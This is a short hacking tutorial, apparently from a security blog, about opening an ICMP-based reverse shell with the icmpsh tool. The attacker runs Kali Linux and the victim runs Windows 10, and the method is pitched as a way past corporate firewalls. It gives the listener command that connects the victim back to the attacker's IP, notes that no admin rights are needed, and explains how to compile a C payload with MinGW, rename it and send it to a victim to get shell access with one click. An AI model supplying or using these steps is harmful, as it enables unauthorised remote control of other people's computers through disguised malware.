Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as a
Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)
Attacker Machine:-
- Download the ICMP SHELL tool Here
- execute command ./run.sh shell script with 777 Permissions ( read, write, execute)
- The output of the shell script command will give a piece of code icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
Victim Machine:-
- Upload “icmpsh.exe” on the victim machine.
- Run CMD and Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as a listener.
- Here Listener script will be icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
- Execute this with CMD & No admin privileges are needed.
Also Read : Operating Systems can be detected using Ping Command
Back to Attacker Machine:-
- Once the Listener is executed on my Windows 10 victim machine, Here we got a shell with ICMP.
- So we can start our command and control of victim’s pc.
- So only, ICMP requests/response traffic only sent via the attacker’s machine to the victim’s machine.
Victims Click & Shell Access:-
- If you want to compromise victim directly by clicking, you can download the c code here
- After downloading compile the c code directly with the known victim IP Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
- Now you can Rename icmp-slave-complete.exe and send it to the victim. SHELL SHELL SHELL !!!